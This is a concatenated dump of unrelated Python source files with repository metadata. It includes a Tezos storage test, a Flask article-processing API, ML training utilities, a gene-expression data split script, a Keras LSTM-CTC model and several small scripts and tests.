] | permissive | tqtezos/pytezos | 3942fdab7aa7851e9ea81350fa360180229ec082 | a4ac0b022d35d4c9f3062609d8ce09d584b5faa8 | refs/heads/master | 2021-07-10T12:24:24.069256 | 2020-04-04T12:46:24 | 2020-04-04T12:46:24 | 227,664,211 | 1 | 0 | MIT | 2020-12-30T16:44:56 | 2019-12-12T17:47:53 | Python | UTF-8 | Python | false | false | 1,130 | py | from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/zeronet/KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM.json')
def test_storage_encoding_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
| [
"[email protected]"
] | |
6f50d5f2a0f722718cb1480dd3c12c423f57a9ac | 5f13ce6fb06d86f99ddcc0d8aa16cc4817ec4b03 | /api.py | 9c029c70498dce7666c1bcb59689c55d50bada12 | [] | no_license | news-ai/news-processing | 1b59f17c24da9f48d35c09db64c98fca18471bb6 | 1b874e186f8b9d8510dd3b47a672a7c08f98e082 | refs/heads/master | 2021-03-19T16:42:57.783382 | 2016-06-11T18:26:31 | 2016-06-11T18:26:31 | 58,774,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,493 | py | # Stdlib imports
import logging
# Third-party app imports
from flask import Flask, request, jsonify
from flask.ext.cors import CORS
from flask_restful import Resource, Api, reqparse
from raven.contrib.flask import Sentry
# Imports from app
from middleware.config import (
SENTRY_USER,
SENTRY_PASSWORD,
SENTRY_APP_ID,
)
from processing.process_article import process_article
from taskrunner import app as celery_app
# Setting up Flask and API
app = Flask(__name__)
api = Api(app)
CORS(app)
# Setting up Sentry
sentry = Sentry(
app, dsn='https://' + SENTRY_USER + ':' + SENTRY_PASSWORD + '@app.getsentry.com/' + SENTRY_APP_ID)
logger = logging.getLogger("sentry.errors")
handler = logging.StreamHandler()
formatter = logging.Formatter("[%(levelname)s] %(name)s: %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
# Setting up parser
parser = reqparse.RequestParser()
parser.add_argument('url')
parser.add_argument('added_by')
parser.add_argument('rss_id')
# Route to POST data for news processing
class Processing(Resource):
def post(self):
args = parser.parse_args()
if 'added_by' in args and args['added_by'] is not None:
return process_article(args)
res = celery_app.send_task(
'processing.process_article.process_article', ([args]))
return jsonify({'id': res.task_id})
api.add_resource(Processing, '/processing')
if __name__ == '__main__':
app.run(port=int('8000'), debug=False)
| [
"[email protected]"
] | |
b4118ccd20e3a44af5e0864ac2e03dd8488f8d35 | a6d62bb9f4cb00fea89ff10e27b516890dc8a49a | /utils/generic_utils.py | 57536f8847a50c7ab234709d48cbf404620729cc | [
"MIT"
] | permissive | WeberJulian/Wav2Vec-Wrapper | dca6be0edd25f67b9a3e2719dc5bee8b0bbdfb4f | 84519cd51a4f3d9cb61de99c5712640f3cf5213d | refs/heads/main | 2023-06-11T15:26:53.754106 | 2021-07-06T17:13:38 | 2021-07-06T17:13:38 | 383,545,362 | 0 | 0 | MIT | 2021-07-06T17:14:03 | 2021-07-06T17:14:03 | null | UTF-8 | Python | false | false | 2,816 | py | import os
import re
import yaml
import json
import torch
import numpy as np
from datasets import load_metric
wer_metric = load_metric("wer")
def calculate_wer(pred_ids, labels, processor, debug=False):
labels[labels == -100] = processor.tokenizer.pad_token_id
pred_string = processor.batch_decode(pred_ids)
label_string = processor.batch_decode(labels, group_tokens=False)
wer = wer_metric.compute(predictions=pred_string, references=label_string)
if debug:
print(" > DEBUG: \n\n PRED:", pred_string, "\n Label:", label_string)
return wer
class AttrDict(dict):
"""A custom dict which converts dict keys
to class attributes"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__dict__ = self
def read_json_with_comments(json_path):
# fallback to json
with open(json_path, "r", encoding="utf-8") as f:
input_str = f.read()
# handle comments
input_str = re.sub(r"\\\n", "", input_str)
input_str = re.sub(r"//.*\n", "\n", input_str)
data = json.loads(input_str)
return data
def load_config(config_path: str) -> AttrDict:
"""Load config files and discard comments
Args:
config_path (str): path to config file.
"""
config = AttrDict()
ext = os.path.splitext(config_path)[1]
if ext in (".yml", ".yaml"):
with open(config_path, "r", encoding="utf-8") as f:
data = yaml.safe_load(f)
else:
data = read_json_with_comments(config_path)
config.update(data)
return config
def load_vocab(voba_path):
config = AttrDict()
config.update(read_json_with_comments(voba_path))
return config
def save_best_checkpoint(log_dir, model, optimizer, lr_scheduler, scaler, step, epoch, val_loss, best_loss, early_epochs=None):
if val_loss < best_loss:
best_loss = val_loss
if early_epochs is not None:
early_epochs = 0
model_save_path = os.path.join(log_dir, 'pytorch_model.bin')
# model.save_pretrained(log_dir) # export model with transformers for save the config too
torch.save(model.state_dict(), model_save_path)
optimizer_save_path = os.path.join(log_dir, 'optimizer.pt')
checkpoint_dict = {
'optimizer': optimizer.state_dict(),
'scheduler': lr_scheduler.state_dict(),
'step': step,
'epoch': epoch
}
if scaler is not None:
checkpoint_dict['scaler'] = scaler.state_dict()
torch.save(checkpoint_dict, optimizer_save_path)
print("\n > BEST MODEL ({0:.5f}) saved at {1:}".format(
val_loss, model_save_path))
else:
if early_epochs is not None:
early_epochs += 1
return best_loss, early_epochs | [
"[email protected]"
] | |
47e279735f840d1e03f6ec23975d5337aa5da6bc | 376e4114a1ef612ae5d0d2a53a74076870562067 | /2017/R1CA/Pancake.py | 91a0621901dc3c2ad74766f7eec04f93645d6b25 | [] | no_license | jacegem/google-codejam-py | 1890e895c56ceb6c4cbcaa4c5cae213f1cb2dd6a | 4e3300021c7f54c339da92afc0974d5076d60499 | refs/heads/master | 2021-06-06T07:45:53.946239 | 2021-04-10T03:30:49 | 2021-04-10T03:30:49 | 89,255,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py |
class Pancake:
def __init__(self, r, h, top, surface):
self.r = r
self.h = h
self.top = top
self.surface = surface
self.used = False
self.top_surface = top + surface
def set_used(self, used):
self.used = used
def is_used(self):
return self.used
def get_top_surface(self):
return self.top_surface
def sort_surface(self):
return self.surface
| [
"[email protected]"
] | |
0c951d03079b7356ec0f67cbf8d87e34b58a4537 | 1edf4c50123a6001b30cff3ad098d566f058ed8f | /utility/dataSplit.py | d7b3bfe61f47b3d43122e90d8c00effdac2fb8d1 | [] | no_license | HaohanWang/geneExpressionRepresentation | be19fa9c89b55063f22614bf6938249275264369 | 5e6881f7e5f3c3a04325437a4894387219e852b8 | refs/heads/master | 2021-01-10T17:44:36.209021 | 2016-05-03T05:44:19 | 2016-05-03T05:44:19 | 50,133,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,246 | py | import numpy as np
# ids = [line.strip() for line in open('../data/ids.txt')]
#
# text = [line.strip() for line in open('../data/ppi_ids.txt')]
#
# ppi = {}
#
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# ppi[(id1, id2)] = 0
#
# count = 0
#
# p = []
# n = []
# np.random.seed(1)
#
# for id1 in ids:
# count += 1
# if count %100==0:
# print id1
# for id2 in ids:
# if (id1, id2) in ppi:
# p.append((id1, id2))
# else:
# if np.random.random() < 0.00017:
# n.append((id1, id2))
#
# print len(n)
# p = p[:12500]
# n = n[:12500]
#
# for i in range(5):
# f1 = open('../data/split/ids_train_'+str(i+1)+'.txt', 'w')
# f2 = open('../data/split/ids_test_'+str(i+1)+'.txt', 'w')
# f1_ = open('../data/split/labels_train_'+str(i+1)+'.txt', 'w')
# f2_ = open('../data/split/labels_test_'+str(i+1)+'.txt', 'w')
#
# for k in range(i*2500, (i+1)*2500):
# f2.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f2_.writelines('1\n')
# for k in range(i*2500, (i+1)*2500):
# f2.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f2_.writelines('0\n')
#
# for k in range(0, i*2500):
# f1.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f1_.writelines('1\n')
# for k in range((i+1)*2500, 12500):
# f1.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f1_.writelines('1\n')
#
# for k in range(0, i*2500):
# f1.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f1_.writelines('0\n')
# for k in range((i+1)*2500, 12500):
# f1.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f1_.writelines('0\n')
#
# f1.close()
# f2.close()
# f1_.close()
# f2_.close()
ids = [line.strip() for line in open('../data/ids.txt')]
print len(ids)
data = np.loadtxt('../data/ge.csv', delimiter=',')
print data.shape
ge = {}
for i in range(len(ids)):
ge[ids[i]] = data[i,:]
#
# for i in range(5):
# t1l = []
# t1r = []
# t2l = []
# t2r = []
#
# #train
# text = [line.strip() for line in open('../data/split/ids_train_'+str(i+1)+'.txt')]
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# t1l.append(ge[id1])
# t1r.append(ge[id2])
# np.savetxt('../data/split/data_train_'+str(i+1)+'_a.txt', t1l, delimiter=',')
# np.savetxt('../data/split/data_train_'+str(i+1)+'_b.txt', t1r, delimiter=',')
#
# #test
# text = [line.strip() for line in open('../data/split/ids_test_'+str(i+1)+'.txt')]
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# t2l.append(ge[id1])
# t2r.append(ge[id2])
# np.savetxt('../data/split/data_test_'+str(i+1)+'_a.txt', t2l, delimiter=',')
# np.savetxt('../data/split/data_test_'+str(i+1)+'_b.txt', t2r, delimiter=',')
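# Build the paired gene-expression matrices for the ids in ids_final.txt:
# one row per protein pair, left gene in data_final_a, right gene in data_final_b.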
text = [line.strip() for line in open('../data/ids_final.txt')]
t1l = []
t1r = []
for line in text:
items = line.split()
id1 = items[0]
id2 = items[1]
t1l.append(ge[id1])
t1r.append(ge[id2])
np.savetxt('../data/split/data_final_a.txt', t1l, delimiter=',')
np.savetxt('../data/split/data_final_b.txt', t1r, delimiter=',')
| [
"[email protected]"
] | |
30665cc9a04c96f8151128447b3694303cff9e74 | 293b7305b86628aa92e23ea10f799b4848661aa5 | /implugin/flashmsg/tests/test_models.py | 6cc1793d411b7303753914717ef8ebcdde503af4 | [] | no_license | socek/impaf-flashmsg | 2ce751c54ff8d9e95f38a691b3579320e3ace546 | 4af4355934f6edf512893f7e9dacfe188179ea62 | refs/heads/master | 2020-04-08T20:58:21.124723 | 2015-08-14T18:05:55 | 2015-08-14T18:05:55 | 38,713,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | from mock import sentinel
from impaf.testing import PyTestCase
from ..models import FlashMessage
class TestFlasMessage(PyTestCase):
_object_cls = FlashMessage
def test_to_dict(self):
obj = self.object(sentinel.message, sentinel.msgtype)
assert obj.to_dict() == {
'message': sentinel.message,
'msgtype': sentinel.msgtype,
}
def test_from_dict(self):
obj = self.object()
obj.from_dict({
'message': sentinel.message,
'msgtype': sentinel.msgtype,
})
assert obj.message == sentinel.message
assert obj.msgtype == sentinel.msgtype
| [
"[email protected]"
] | |
1ce69a1233f5a517348185955b4ec1e46eafffd4 | c7aea375046d194a5bd3c9fda615519f4374b790 | /lab3/text_recognizer/networks/line_lstm_ctc.py | 35205b418d4502e5425aa5d9522fd2821741b094 | [] | no_license | venuraja79/fsdl-text-recognizer-project | 195b16bff453df5acda65181e96f65cb98172b54 | 1b9d20f0de2dd5aa59af490b086f985411c60e20 | refs/heads/master | 2020-06-30T22:09:45.433461 | 2019-08-07T08:53:05 | 2019-08-07T08:53:05 | 200,964,049 | 0 | 1 | null | 2019-08-07T03:20:26 | 2019-08-07T03:20:24 | null | UTF-8 | Python | false | false | 2,406 | py | """LSTM with CTC for handwritten text recognition within a line."""
import tensorflow.keras.backend as K
from tensorflow.python.client import device_lib # pylint: disable=no-name-in-module
from tensorflow.keras.layers import Dense, Input, Reshape, TimeDistributed, Lambda, LSTM, CuDNNLSTM
from tensorflow.keras.models import Model as KerasModel
from text_recognizer.networks.lenet import lenet
from text_recognizer.networks.misc import slide_window
from text_recognizer.networks.ctc import ctc_decode
def line_lstm_ctc(input_shape, output_shape, window_width=28, window_stride=14): # pylint: disable=too-many-locals
image_height, image_width = input_shape
output_length, num_classes = output_shape
num_windows = int((image_width - window_width) / window_stride) + 1
if num_windows < output_length:
raise ValueError(f'Window width/stride need to generate >= {output_length} windows (currently {num_windows})')
image_input = Input(shape=input_shape, name='image')
y_true = Input(shape=(output_length,), name='y_true')
input_length = Input(shape=(1,), name='input_length')
label_length = Input(shape=(1,), name='label_length')
gpu_present = len(device_lib.list_local_devices()) > 2
lstm_fn = CuDNNLSTM if gpu_present else LSTM
# Your code should use slide_window and extract image patches from image_input.
# Pass a convolutional model over each image patch to generate a feature vector per window.
# Pass these features through one or more LSTM layers.
# Convert the lstm outputs to softmax outputs.
# Note that lstms expect a input of shape (num_batch_size, num_timesteps, feature_length).
# Your code below (Lab 3)
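# --- Sketch of one possible implementation (not the official lab solution). ---
# Assumes slide_window(image, window_width, window_stride) yields patches shaped
# (num_windows, image_height, window_width, 1) and that lenet()'s penultimate
# layer outputs a flat feature vector; adjust if your helpers differ.
image_reshaped = Reshape((image_height, image_width, 1))(image_input)
image_patches = Lambda(
slide_window,
arguments={'window_width': window_width, 'window_stride': window_stride}
)(image_reshaped)
# Reuse lenet as a per-window feature extractor by cutting off its final layer.
convnet = lenet((image_height, window_width, 1), (num_classes,))
convnet = KerasModel(inputs=convnet.inputs, outputs=convnet.layers[-2].output)
convnet_outputs = TimeDistributed(convnet)(image_patches)
# One recurrent layer over the window features, then per-timestep softmax.
lstm_output = lstm_fn(128, return_sequences=True)(convnet_outputs)
softmax_output = Dense(num_classes, activation='softmax', name='softmax_output')(lstm_output)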
# Your code above (Lab 3)
input_length_processed = Lambda(
lambda x, num_windows=None: x * num_windows,
arguments={'num_windows': num_windows}
)(input_length)
ctc_loss_output = Lambda(
lambda x: K.ctc_batch_cost(x[0], x[1], x[2], x[3]),
name='ctc_loss'
)([y_true, softmax_output, input_length_processed, label_length])
ctc_decoded_output = Lambda(
lambda x: ctc_decode(x[0], x[1], output_length),
name='ctc_decoded'
)([softmax_output, input_length_processed])
model = KerasModel(
inputs=[image_input, y_true, input_length, label_length],
outputs=[ctc_loss_output, ctc_decoded_output]
)
return model
| [
"[email protected]"
] | |
f49719da2036ba7ff1dc02db5fb0434c2acd830a | f23a0561ed2e1f5192a2933ba3205bbc84e0172c | /ruidun_system/internet_operate/viewsets/get_monitoring_viewset.py | f7d1a4efbee6c85c9b9e2e159797e78386e57bc5 | [] | no_license | TingxieLi/django-restframework | a179a794760830cedcf60c0069cb7c8d4c7127cd | 3645bc3a396727af208db924c6fdee38abc0f894 | refs/heads/master | 2020-12-05T13:13:29.937243 | 2019-07-18T03:33:23 | 2019-07-18T03:33:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | from rest_framework import viewsets
class GetMonitoringViewSet(viewsets.ReadOnlyModelViewSet):
def retrieve(self, request, *args, **kwargs):
# Fetch the video content. The video should be streamed in real time; how should the data be returned here?
pass
| [
"[email protected]"
] | |
08f94cf25a949eefbaca4cf0a9b2fc8d254be62e | f295b56e9af284092233a724af041a91b35a9f6a | /binary-tree-level-order-traversal/binary-tree-level-order-traversal.py | eb00973a0045f605df9fbf717059748d2f4e83a2 | [] | no_license | saviaga/Coding_E | 7ebdf03b5eca775903ee4b863b56e26190b40029 | dd21bb3b9d8905263416b206877f1a3d9416ee3f | refs/heads/main | 2023-05-02T19:42:07.267054 | 2021-05-21T17:41:52 | 2021-05-21T17:41:52 | 334,220,320 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def levelOrder(self, root: TreeNode) -> List[List[int]]:
if root is None:
return
queue = collections.deque([root])
ans = []
while queue:
level = []
for _ in range(len(queue)):
current = queue.popleft()
level.append(current.val)
if current.left:
queue.append(current.left)
if current.right:
queue.append(current.right)
ans.append(level)
return ans
| [
"[email protected]"
] | |
4ce02e446ce4895df060625959a73f6d4a1e7ff2 | 1deda52f84b25e52a70dd26afa31c1e40a8391ac | /tools/improved-bertscore-for-image-captioning-evaluation/match_cand_refs.py | e691f1f139291d3f3ce03d32227a38703e6144ae | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jlcsilva/syncap | 7ae7b7974b1c3eeb6507006a325725a67c765c7b | c8191de4e77b6ea9109f124b9f398d9f2c7d7662 | refs/heads/master | 2023-04-10T23:16:39.902339 | 2021-04-23T06:03:24 | 2021-04-23T06:03:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | import json
import argparse
from collections import defaultdict
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--refs_file')
parser.add_argument('--cand_file')
parser.add_argument('--output_fn')
args = parser.parse_args()
# Refs
j = json.load(open(args.refs_file))
anns = j['annotations']
image2anns = defaultdict(list)
for ann in anns:
image2anns[ann['image_id']].append(ann['caption'].strip())
# Cand
j = json.load(open(args.cand_file))
image2cand = defaultdict(list)
for ann in j:
image2cand[ann['image_id']].append(ann['caption'])
samples = {}
for ix, img in enumerate(image2cand):
d = dict()
d['refs'] = image2anns[img] #[:5]
d['cand'] = image2cand[img]
samples[str(ix)] = d
with open(args.output_fn, 'w') as f:
json.dump(samples, f)
| [
"[email protected]"
] | |
79d14202170a7d08135e126bbb7479e3da932f84 | 09f0505f3ac1dccaf301c1e363423f38768cc3cc | /r_DailyProgrammer/Easy/C266/unittests/unittest.py | 07fde993ddb932a70f2021b847e679aadef121e2 | [] | no_license | Awesome-Austin/PythonPractice | 02212292b92814016d062f0fec1c990ebde21fe7 | 9a717f91d41122be6393f9fcd1a648c5e62314b3 | refs/heads/master | 2023-06-21T11:43:59.366064 | 2021-07-29T23:33:00 | 2021-07-29T23:33:00 | 270,854,302 | 0 | 0 | null | 2020-08-11T20:47:10 | 2020-06-08T23:24:09 | Python | UTF-8 | Python | false | false | 259 | py | #! python3
import unittest
from r_DailyProgrammer.Easy.C266.unittests.test_values import TEST_VALUES
class MyTestCase(unittest.TestCase):
def test_something(self):
self.assertEqual(True, False)
if __name__ == '__main__':
unittest.main()
| [
"{ID}+{username}@users.noreply.github.com"
] | {ID}+{username}@users.noreply.github.com |
994ef013a80753d1c06d852b575d1419200b2001 | 631c71f4f4309668dd7a3de9e7eeef944eac2158 | /src/pretix/__init__.py | 9e086b08d5bc3bcda9b85a56c4141cb81d10c768 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | bhaettasch/pretix | 943ee6d8cb48fccd343e2e6fa054c8c4c86f5231 | 5e355b400573783bdd17b1352aefcb36b0efc3f6 | refs/heads/master | 2021-04-18T16:19:48.121409 | 2021-01-05T08:23:00 | 2021-01-05T08:23:00 | 249,561,199 | 0 | 0 | NOASSERTION | 2020-03-23T22:48:21 | 2020-03-23T22:48:20 | null | UTF-8 | Python | false | false | 28 | py | __version__ = "3.15.0.dev0"
| [
"[email protected]"
] | |
7e177a8d82713addc215fa1037b0a74cbfaafb7d | b9be3d951bfab350191092540edc6e353283d621 | /.direnv/python-3.4.3/bin/rst2xml.py | 94a9206c1126cc30a738a855d3950f2aca899539 | [] | no_license | bekkblando/django-social | 7ebd82f66c82ffa6918621e5ee7142bfa5f712d8 | fe47d1babb94170e5403af9ce0f3c672c3045a0d | refs/heads/master | 2020-12-11T01:40:01.429628 | 2015-08-18T14:24:33 | 2015-08-18T14:24:33 | 38,706,690 | 0 | 0 | null | 2015-07-07T18:25:26 | 2015-07-07T18:25:25 | null | UTF-8 | Python | false | false | 668 | py | #!/Users/BekkBlando/Documents/github/djangosocial/.direnv/python-3.4.3/bin/python3.4
# $Id: rst2xml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing Docutils XML.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates Docutils-native XML from standalone '
'reStructuredText sources. ' + default_description)
publish_cmdline(writer_name='xml', description=description)
| [
"[email protected]"
] | |
52aee0fd09b24edae3d34ee70ae4d681a2aa67da | 3291359d8867e7b5ca9e8befb83629810938f903 | /timetable_v3/timetable_v3/urls.py | eb0c1bca0f82d83d2d60c6e88d1f7d126e417997 | [] | no_license | A-miin/timetable_v3 | f9e4610800acb83f3477dcffd2b0ce1c75d2c1d0 | 1de0885f04beec83657672275deff22b71af2de3 | refs/heads/master | 2023-06-09T18:51:44.298534 | 2021-07-02T15:01:54 | 2021-07-02T15:01:54 | 341,462,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,035 | py | """timetable_v3 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
import debug_toolbar
from webapp import urls
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('webapp.urls')),
path('secretariat/', include('secretariat.urls', namespace='secretariat')),
path('api/', include('api.urls', namespace='api')),
path('__debug__/', include(debug_toolbar.urls)),
]
| [
"[email protected]"
] | |
2ad7d7451c252323a7b922b7ce42a3e1f7a03c10 | 1ec29bec73904435980eedc26b3f1e07fafb8784 | /shmakovpn/tests/add_method_to_class/test_add_method_to_class.py | cbf04d3fd1befc3caed91a88242ef0ba4f9491ed | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | shmakovpn/shmakovpn_tools | 4f799c803f4ebdff0e82253ec161d5977e6036cb | 85090c9489b0b9fa13b6c42c91459efe9b966a3b | refs/heads/master | 2023-06-08T17:32:34.591391 | 2021-06-17T05:22:38 | 2021-06-17T05:22:38 | 284,875,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | """
The simple example that explains the impossibility of adding a method to builtin type.
Author: shmakovpn <[email protected]>
Date: 2020-10-01
"""
import unittest
class TestAddMethodToClass(unittest.TestCase):
"""
It is possible to add a method to a class outside of the class
"""
def test_add_method_to_class(self):
class A:
x = 'hello'
a = A()
A.get_x = lambda self: self.x
self.assertEqual(a.get_x(), 'hello')
def test_add_method_to_list(self):
"""
It is impossible to add a method to a built-in type
:return:
"""
try:
list.hello = lambda self: f'hello from list'
some_list = []
self.assertEqual(some_list.hello(), 'hello from list')
except TypeError as e:
pass
except Exception as e:
self.assertTrue(False, msg='An unknown exception was raised instead of the expected TypeError')
else:
self.assertTrue(False, msg='The expected TypeError exception was not raised')
| [
"[email protected]"
] | |
66d3b0de7469b1683d10d96d96d69ab4acea07d3 | 56b36ddf920b5f43e922cb84e8f420f1ad91a889 | /Hackerrank/Hackkerrank-Designer PDF Viewer.py | 1c85d2e8aa255eccd12daed1cbc4d104ce1bd3ca | [] | no_license | chithien0909/Competitive-Programming | 9ede2072e85d696ccf143118b17638bef9fdc07c | 1262024a99b34547a3556c54427b86b243594e3c | refs/heads/master | 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the designerPdfViewer function below.
def designerPdfViewer(h, word):
# word = nhan
# arr = [1,3,2,1]
arr=[]
for letter in word:
index = ord(letter) - 97
arr.append(h[index])
return max(arr) * len(arr)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
h = list(map(int, input().rstrip().split()))
word = input()
result = designerPdfViewer(h, word)
fptr.write(str(result) + '\n')
fptr.close() | [
"[email protected]"
] | |
07c43020b2c4de524585a2995ba0ad589f42ef70 | 8fd92c0a65c9b3e3912b6e8ef043656ee225880a | /datetime_examples.py | e6023b44234c3f6cfb1b822db2448812f1685d86 | [] | no_license | waiteb15/py3forsci3day | 9fbcbb59f1c14f3d91cb2599d7ca8b4d6ac628c4 | fc664042618f0910d40e85677a2438eef5cce2b7 | refs/heads/master | 2020-04-25T11:24:18.697218 | 2019-02-28T23:40:52 | 2019-02-28T23:40:52 | 172,743,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | #!/usr/bin/env python
from datetime import date, datetime, timedelta, time
today = date.today()
print(today, today.year)
james_bd = date(2014, 8, 1)
print(james_bd)
delta = today - james_bd
print(delta)
years = int(delta.days // 365.25)
print(f"James is {years} years old")
event = datetime(2019, 5, 11, 13, 22, 47)
print(event)
ten_years = timedelta(10 * 365.25)
print(james_bd + ten_years)
import time
start = time.time()
# do something
end = time.time()
seconds = end - start
print("Wait for it....", end="", flush=True)
time.sleep(0)
print("done")
from dateutil.parser import parse
import dateutil.utils
my_dates = [
"Apr 1, 2019",
"2019-04-01",
"4/1/19",
"4-1-2019",
"April 1 2019",
"Feb 31, 2032",
]
for d in my_dates:
try:
print(parse(d))
except Exception as err:
print(err)
d = dateutil.utils.datetime(2019, 4, 1, 11, 11, 11, 0)
print(d, type(d))
| [
"[email protected]"
] | |
10ebe15e221446bab08a4d897fc101f9d8a8b95f | a5aabe2e4057d78e687a57a6b560516a7cdb5836 | /unsserv/common/rpc/protocol.py | 688b39a308b01db7dacf58311fc8aea432c875c7 | [
"MIT"
] | permissive | aratz-lasa/py-unsserv | 0ffc09ddab65a11ce917d0faa8b1b5dff091e563 | 6f332385e55d05953186b9a8b7848bca4b878e18 | refs/heads/master | 2022-12-14T21:10:12.397834 | 2020-05-03T11:29:49 | 2020-05-03T11:29:49 | 228,329,158 | 5 | 0 | MIT | 2022-12-08T07:00:55 | 2019-12-16T07:35:20 | Python | UTF-8 | Python | false | false | 2,808 | py | import asyncio
from abc import ABC, abstractmethod
from dataclasses import is_dataclass, asdict
from enum import IntEnum
from typing import Any, Tuple, Sequence, Dict, Callable
from unsserv.common.rpc.rpc import RPCRegister, RPC
from unsserv.common.rpc.structs import Message
from unsserv.common.structs import Node
Command = IntEnum
Data = Any
Handler = Callable[..., Any]
class ITranscoder(ABC):
my_node: Node
service_id: str
def __init__(self, my_node: Node, service_id: str):
self.my_node = my_node
self.service_id = service_id
@abstractmethod
def encode(self, command: Command, *data: Data) -> Message:
pass
@abstractmethod
def decode(self, message: Message) -> Tuple[Command, Sequence[Data]]:
pass
class AProtocol:
my_node: Node
service_id: str
_rpc: RPC
_transcoder: ITranscoder
_handlers: Dict[Command, Handler]
_running: bool
def __init__(self, my_node: Node):
self.my_node = my_node
self._rpc = RPCRegister.get_rpc(my_node)
self._handlers = {}
self._running = False
async def start(self, service_id: str):
if self._running:
raise RuntimeError("Protocol already running")
self.service_id = service_id
self._transcoder = self._get_new_transcoder()
await self._rpc.register_service(service_id, self.handle_rpc)
self._running = True
async def stop(self):
if self._running:
await self._rpc.unregister_service(self.service_id)
self._running = False
async def handle_rpc(self, message: Message):
command, data = self._transcoder.decode(message)
handler = self._handlers[command]
if asyncio.iscoroutinefunction(handler):
response = await handler(message.node, *data)
return self._encode_response(response)
else:
response = handler(message.node, *data)
return self._encode_response(response)
def _encode_response(self, response: Any) -> Any:
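# Recursively convert a handler's return value into plain serializable data:
# lists/tuples are walked element by element, objects exposing encode() are
# encoded, dataclasses become dicts, and sets become lists.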
if isinstance(response, list):
return [self._encode_response(response_item) for response_item in response]
elif isinstance(response, tuple):
return tuple(
self._encode_response(response_item) for response_item in response
)
elif hasattr(response, "encode"):
return response.encode()
elif is_dataclass(response):
return asdict(response)
elif isinstance(response, set):
return list(response)
return response
@abstractmethod
def _get_new_transcoder(self):
"""
Factory method that builds the ITranscoder for this protocol; every
protocol implements its own.
:return: the protocol-specific ITranscoder instance
"""
pass
| [
"[email protected]"
] | |
1fc201d942e296adbcf250786df3f816a80ddebd | e6c65e2e354336a4bea5b6a4ccbccd3682915fe2 | /out-bin/py/google/fhir/seqex/bundle_to_seqex_test.runfiles/com_google_fhir/external/pypi__nose_1_3_7/nose/plugins/testid.py | 3bd121362c001ad4cc26af2877fb5c2b5dc40673 | [
"Apache-2.0"
] | permissive | rasalt/fhir-datalab | c30ab773d84983dd04a37e9d0ddec8bf2824b8a4 | 3e329fc8b4226d3e3a4a7c23c306a86e7a9ea0de | refs/heads/master | 2021-10-09T05:51:04.593416 | 2018-12-21T18:11:03 | 2018-12-22T05:38:32 | 162,744,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 125 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/0ddaa3627472ad9d1367a008236ce2f5/external/pypi__nose_1_3_7/nose/plugins/testid.py | [
"[email protected]"
] | |
